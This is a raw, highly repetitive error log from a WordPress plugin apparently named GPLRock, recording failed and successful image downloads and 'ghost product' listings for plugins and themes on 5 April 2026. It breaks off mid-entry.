download failed for product woocommerce-update-cart-item-variations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-update-cart-item-variations-15798.webp for product woocommerce-update-cart-item-variations after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:11:12 UTC] GPLRock: Image download failed for product woocommerce-update-cart-item-variations (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:14 UTC] GPLRock: Image download failed for product woocommerce-update-cart-item-variations (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-update-cart-item-variations-15798.webp for product woocommerce-update-cart-item-variations after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:11:16 UTC] GPLRock WARNING: Image download failed for product woocommerce-update-cart-item-variations. URL: https://meldwp.com/wp-content/uploads/woocommerce-update-cart-item-variations-15798.webp [05-Apr-2026 13:11:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-update-cart-item-variations [05-Apr-2026 13:11:16 UTC] GPLRock: Image downloaded successfully for product marketplace-table-rate-shipping-plugin-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-02f575df.webp [05-Apr-2026 13:11:16 UTC] GPLRock: Using pre-downloaded image for product marketplace-table-rate-shipping-plugin-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-02f575df.webp [05-Apr-2026 13:11:16 UTC] GPLRock: Ghost product published with image - Product ID: marketplace-table-rate-shipping-plugin-for-woocommerce [05-Apr-2026 13:11:16 UTC] GPLRock: Image download failed for product wordpress-woocommerce-repeat-order-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:18 UTC] GPLRock: Image download failed for product wordpress-woocommerce-repeat-order-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-repeat-order-plugin-30137.webp for product wordpress-woocommerce-repeat-order-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:11:21 UTC] GPLRock: Image download failed for product wordpress-woocommerce-repeat-order-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:23 UTC] GPLRock: Image download failed for product wordpress-woocommerce-repeat-order-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:11:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-woocommerce-repeat-order-plugin-30137.webp for product wordpress-woocommerce-repeat-order-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:11:25 UTC] GPLRock WARNING: Image download failed for product wordpress-woocommerce-repeat-order-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-woocommerce-repeat-order-plugin-30137.webp [05-Apr-2026 13:11:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-woocommerce-repeat-order-plugin [05-Apr-2026 13:12:07 UTC] GPLRock: Image download failed for product woocommerce-product-enquiry-woocommerce-request-a-quote-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:09 UTC] GPLRock: Image download failed for product woocommerce-product-enquiry-woocommerce-request-a-quote-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-enquiry--woocommerce-request-a-quote-plugin-24489.webp for product woocommerce-product-enquiry-woocommerce-request-a-quote-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:11 UTC] GPLRock: Image download failed for product woocommerce-product-enquiry-woocommerce-request-a-quote-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:13 UTC] GPLRock: Image download failed for product woocommerce-product-enquiry-woocommerce-request-a-quote-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-enquiry--woocommerce-request-a-quote-plugin-24489.webp for product woocommerce-product-enquiry-woocommerce-request-a-quote-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:15 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-enquiry-woocommerce-request-a-quote-plugin. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-enquiry--woocommerce-request-a-quote-plugin-24489.webp [05-Apr-2026 13:12:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-enquiry-woocommerce-request-a-quote-plugin [05-Apr-2026 13:12:15 UTC] GPLRock: Image download failed for product junction-external-links-controller-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:18 UTC] GPLRock: Image download failed for product junction-external-links-controller-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/junction--external-links-controller-for-wordpress-31565.webp for product junction-external-links-controller-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:20 UTC] GPLRock: Image download failed for product junction-external-links-controller-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:22 UTC] GPLRock: Image download failed for product junction-external-links-controller-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/junction--external-links-controller-for-wordpress-31565.webp for product junction-external-links-controller-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:24 UTC] GPLRock WARNING: Image download failed for product junction-external-links-controller-for-wordpress. URL: https://meldwp.com/wp-content/uploads/junction--external-links-controller-for-wordpress-31565.webp [05-Apr-2026 13:12:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: junction-external-links-controller-for-wordpress [05-Apr-2026 13:12:24 UTC] GPLRock: Image download failed for product user-profile-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:26 UTC] GPLRock: Image download failed for product user-profile-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/user-profile-elementor-22825.webp for product user-profile-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:28 UTC] GPLRock: Image download failed for product user-profile-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:31 UTC] GPLRock: Image download failed for product user-profile-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/user-profile-elementor-22825.webp for product user-profile-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:33 UTC] GPLRock WARNING: Image download failed for product user-profile-elementor. URL: https://meldwp.com/wp-content/uploads/user-profile-elementor-22825.webp [05-Apr-2026 13:12:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: user-profile-elementor [05-Apr-2026 13:12:33 UTC] GPLRock: Image download failed for product sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:35 UTC] GPLRock: Image download failed for product sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sticky-radio-player-wordpress-plugin---full-width-shoutcast-and-icecast-html5-pl-14970.webp for product sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:37 UTC] GPLRock: Image download failed for product sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:39 UTC] GPLRock: Image download failed for product sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sticky-radio-player-wordpress-plugin---full-width-shoutcast-and-icecast-html5-pl-14970.webp for product sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:41 UTC] GPLRock WARNING: Image download failed for product sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player. URL: https://meldwp.com/wp-content/uploads/sticky-radio-player-wordpress-plugin---full-width-shoutcast-and-icecast-html5-pl-14970.webp [05-Apr-2026 13:12:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sticky-radio-player-wordpress-plugin-full-width-shoutcast-and-icecast-html5-player [05-Apr-2026 13:12:42 UTC] GPLRock: Image download failed for product pros-cons-widget-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:44 UTC] GPLRock: Image download failed for product pros-cons-widget-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pros--cons-widget-for-elementor-26532.webp for product pros-cons-widget-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:46 UTC] GPLRock: Image download failed for product pros-cons-widget-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:48 UTC] GPLRock: Image download failed for product pros-cons-widget-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pros--cons-widget-for-elementor-26532.webp for product pros-cons-widget-for-elementor after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:50 UTC] GPLRock WARNING: Image download failed for product pros-cons-widget-for-elementor. URL: https://meldwp.com/wp-content/uploads/pros--cons-widget-for-elementor-26532.webp [05-Apr-2026 13:12:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pros-cons-widget-for-elementor [05-Apr-2026 13:12:50 UTC] GPLRock: Image downloaded successfully for product ninja-forms-google-spreadsheet-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-50755ef6.webp [05-Apr-2026 13:12:50 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-google-spreadsheet-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-50755ef6.webp [05-Apr-2026 13:12:50 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-google-spreadsheet-addon [05-Apr-2026 13:12:50 UTC] GPLRock: Image downloaded successfully for product mp3-sticky-player-wordpress-woocommerce-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-62034dcc.webp [05-Apr-2026 13:12:50 UTC] GPLRock: Using pre-downloaded image for product mp3-sticky-player-wordpress-woocommerce-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-62034dcc.webp [05-Apr-2026 13:12:50 UTC] GPLRock: Ghost product published with image - Product ID: mp3-sticky-player-wordpress-woocommerce-plugin [05-Apr-2026 13:12:50 UTC] GPLRock: Image download failed for product ai-chatbot-for-automated-live-chat-support (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:53 UTC] GPLRock: Image download failed for product ai-chatbot-for-automated-live-chat-support (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ai-chatbot-for-automated-live-chat-support-23769.webp for product ai-chatbot-for-automated-live-chat-support after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:55 UTC] GPLRock: Image download failed for product ai-chatbot-for-automated-live-chat-support (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:57 UTC] GPLRock: Image download failed for product ai-chatbot-for-automated-live-chat-support (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:12:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ai-chatbot-for-automated-live-chat-support-23769.webp for product ai-chatbot-for-automated-live-chat-support after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:12:59 UTC] GPLRock WARNING: Image download failed for product ai-chatbot-for-automated-live-chat-support. URL: https://meldwp.com/wp-content/uploads/ai-chatbot-for-automated-live-chat-support-23769.webp [05-Apr-2026 13:12:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ai-chatbot-for-automated-live-chat-support [05-Apr-2026 13:12:59 UTC] GPLRock: Image download failed for product christmas-rain-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:13:01 UTC] GPLRock: Image download failed for product christmas-rain-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:13:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/christmas-rain---wordpress-plugin-15782.webp for product christmas-rain-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:13:03 UTC] GPLRock: Image download failed for product christmas-rain-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:13:05 UTC] GPLRock: Image download failed for product christmas-rain-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:13:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/christmas-rain---wordpress-plugin-15782.webp for product christmas-rain-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:13:08 UTC] GPLRock WARNING: Image download failed for product christmas-rain-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/christmas-rain---wordpress-plugin-15782.webp [05-Apr-2026 13:13:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: christmas-rain-wordpress-plugin [05-Apr-2026 13:13:08 UTC] GPLRock: Image download failed for product bboots-mini-cms-system-for-phpbb (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:13:10 UTC] GPLRock: Image download failed for product bboots-mini-cms-system-for-phpbb (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:13:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bboots---mini-cms-system-for-phpbb-7100.webp for product bboots-mini-cms-system-for-phpbb after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:13:12 UTC] GPLRock: Image download failed for product bboots-mini-cms-system-for-phpbb (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:13:14 UTC] GPLRock: Image download failed for product bboots-mini-cms-system-for-phpbb (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:13:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bboots---mini-cms-system-for-phpbb-7100.webp for product bboots-mini-cms-system-for-phpbb after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:13:16 UTC] GPLRock WARNING: Image download failed for product bboots-mini-cms-system-for-phpbb. URL: https://meldwp.com/wp-content/uploads/bboots---mini-cms-system-for-phpbb-7100.webp [05-Apr-2026 13:13:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bboots-mini-cms-system-for-phpbb [05-Apr-2026 13:14:04 UTC] GPLRock: Image download failed for product qesco-logistic-shipping-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:14:06 UTC] GPLRock: Image download failed for product qesco-logistic-shipping-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:14:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qesco--logistic-shipping-company-wordpress-theme-14334.webp for product qesco-logistic-shipping-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:14:08 UTC] GPLRock: Image download failed for product qesco-logistic-shipping-company-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:14:11 UTC] GPLRock: Image download failed for product qesco-logistic-shipping-company-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:14:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qesco--logistic-shipping-company-wordpress-theme-14334.webp for product qesco-logistic-shipping-company-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:14:13 UTC] GPLRock WARNING: Image download failed for product qesco-logistic-shipping-company-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/qesco--logistic-shipping-company-wordpress-theme-14334.webp [05-Apr-2026 13:14:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qesco-logistic-shipping-company-wordpress-theme [05-Apr-2026 13:14:13 UTC] GPLRock: Image download failed for product amely-fashion-shop-wordpress-theme-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:14:15 UTC] GPLRock: Image download failed for product amely-fashion-shop-wordpress-theme-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:14:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amely---fashion-shop-wordpress-theme-for-woocommerce-2074.webp for product amely-fashion-shop-wordpress-theme-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:14:17 UTC] GPLRock: Image download failed for product amely-fashion-shop-wordpress-theme-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:22 UTC] GPLRock: Image download failed for product rest-api-module-for-worksuite-saas-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:24 UTC] GPLRock: Image download failed for product rest-api-module-for-worksuite-saas-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rest-api-module-for-worksuite-saas-crm-23787.webp for product rest-api-module-for-worksuite-saas-crm after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:24:26 UTC] GPLRock: Image download failed for product rest-api-module-for-worksuite-saas-crm (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:28 UTC] GPLRock: Image download failed for product rest-api-module-for-worksuite-saas-crm (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rest-api-module-for-worksuite-saas-crm-23787.webp for product rest-api-module-for-worksuite-saas-crm after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:24:30 UTC] GPLRock WARNING: Image download failed for product rest-api-module-for-worksuite-saas-crm. URL: https://meldwp.com/wp-content/uploads/rest-api-module-for-worksuite-saas-crm-23787.webp [05-Apr-2026 13:24:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rest-api-module-for-worksuite-saas-crm [05-Apr-2026 13:24:31 UTC] GPLRock: Image download failed for product amp-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:33 UTC] GPLRock: Image download failed for product amp-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amp-plugin-for-woocommerce-23821.webp for product amp-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:24:35 UTC] GPLRock: Image download failed for product amp-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:37 UTC] GPLRock: Image download failed for product amp-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amp-plugin-for-woocommerce-23821.webp for product amp-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:24:39 UTC] GPLRock WARNING: Image download failed for product amp-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/amp-plugin-for-woocommerce-23821.webp [05-Apr-2026 13:24:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amp-plugin-for-woocommerce [05-Apr-2026 13:24:39 UTC] GPLRock: Image download failed for product social-events-for-videos-add-on-for-easy-social-share-buttons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:41 UTC] GPLRock: Image download failed for product social-events-for-videos-add-on-for-easy-social-share-buttons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-events-for-videos-add-on-for-easy-social-share-buttons-18957.webp for product social-events-for-videos-add-on-for-easy-social-share-buttons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:24:44 UTC] GPLRock: Image download failed for product social-events-for-videos-add-on-for-easy-social-share-buttons (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:46 UTC] GPLRock: Image download failed for product social-events-for-videos-add-on-for-easy-social-share-buttons (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/social-events-for-videos-add-on-for-easy-social-share-buttons-18957.webp for product social-events-for-videos-add-on-for-easy-social-share-buttons after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:24:48 UTC] GPLRock WARNING: Image download failed for product social-events-for-videos-add-on-for-easy-social-share-buttons. URL: https://meldwp.com/wp-content/uploads/social-events-for-videos-add-on-for-easy-social-share-buttons-18957.webp [05-Apr-2026 13:24:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: social-events-for-videos-add-on-for-easy-social-share-buttons [05-Apr-2026 13:24:48 UTC] GPLRock: Image download failed for product voxey-amazon-polly-text-to-speech-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:50 UTC] GPLRock: Image download failed for product voxey-amazon-polly-text-to-speech-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voxey--amazon-polly-text-to-speech-plugin-for-wordpress-3452.webp for product voxey-amazon-polly-text-to-speech-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:24:52 UTC] GPLRock: Image download failed for product voxey-amazon-polly-text-to-speech-plugin-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:54 UTC] GPLRock: Image download failed for product voxey-amazon-polly-text-to-speech-plugin-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/voxey--amazon-polly-text-to-speech-plugin-for-wordpress-3452.webp for product voxey-amazon-polly-text-to-speech-plugin-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:24:56 UTC] GPLRock WARNING: Image download failed for product voxey-amazon-polly-text-to-speech-plugin-for-wordpress. URL: https://meldwp.com/wp-content/uploads/voxey--amazon-polly-text-to-speech-plugin-for-wordpress-3452.webp [05-Apr-2026 13:24:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: voxey-amazon-polly-text-to-speech-plugin-for-wordpress [05-Apr-2026 13:24:57 UTC] GPLRock: Image download failed for product revolution-lightbox (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:24:59 UTC] GPLRock: Image download failed for product revolution-lightbox (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revolution-lightbox-32261.webp for product revolution-lightbox after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:01 UTC] GPLRock: Image download failed for product revolution-lightbox (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:03 UTC] GPLRock: Image download failed for product revolution-lightbox (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revolution-lightbox-32261.webp for product revolution-lightbox after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:05 UTC] GPLRock WARNING: Image download failed for product revolution-lightbox. URL: https://meldwp.com/wp-content/uploads/revolution-lightbox-32261.webp [05-Apr-2026 13:25:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: revolution-lightbox [05-Apr-2026 13:25:05 UTC] GPLRock: Image download failed for product firstdata-payeezy-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:07 UTC] GPLRock: Image download failed for product firstdata-payeezy-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/firstdata-payeezy-payment-gateway-woocommerce-plugin-27544.webp for product firstdata-payeezy-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:10 UTC] GPLRock: Image download failed for product firstdata-payeezy-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:12 UTC] GPLRock: Image download failed for product firstdata-payeezy-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/firstdata-payeezy-payment-gateway-woocommerce-plugin-27544.webp for product firstdata-payeezy-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:14 UTC] GPLRock WARNING: Image download failed for product firstdata-payeezy-payment-gateway-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/firstdata-payeezy-payment-gateway-woocommerce-plugin-27544.webp [05-Apr-2026 13:25:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: firstdata-payeezy-payment-gateway-woocommerce-plugin [05-Apr-2026 13:25:14 UTC] GPLRock: Image download failed for product mailchimp-add-on-chauffeur-taxi-booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:16 UTC] GPLRock: Image download failed for product mailchimp-add-on-chauffeur-taxi-booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailchimp-add-on-chauffeur-taxi-booking-system-9518.webp for product mailchimp-add-on-chauffeur-taxi-booking-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:18 UTC] GPLRock: Image download failed for product mailchimp-add-on-chauffeur-taxi-booking-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:20 UTC] GPLRock: Image download failed for product mailchimp-add-on-chauffeur-taxi-booking-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mailchimp-add-on-chauffeur-taxi-booking-system-9518.webp for product mailchimp-add-on-chauffeur-taxi-booking-system after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:23 UTC] GPLRock WARNING: Image download failed for product mailchimp-add-on-chauffeur-taxi-booking-system. URL: https://meldwp.com/wp-content/uploads/mailchimp-add-on-chauffeur-taxi-booking-system-9518.webp [05-Apr-2026 13:25:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mailchimp-add-on-chauffeur-taxi-booking-system [05-Apr-2026 13:25:23 UTC] GPLRock: Image download failed for product wordpress-push-notifications-woocommerce-push-notifications (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:25 UTC] GPLRock: Image download failed for product wordpress-push-notifications-woocommerce-push-notifications (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-push-notifications---woocommerce-push-notifications-15726.webp for product wordpress-push-notifications-woocommerce-push-notifications after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 13:25:27 UTC] GPLRock: Image download failed for product wordpress-push-notifications-woocommerce-push-notifications (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:29 UTC] GPLRock: Image download failed for product wordpress-push-notifications-woocommerce-push-notifications (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 13:25:31 UTC] GPLRock Error: Failed to download image from 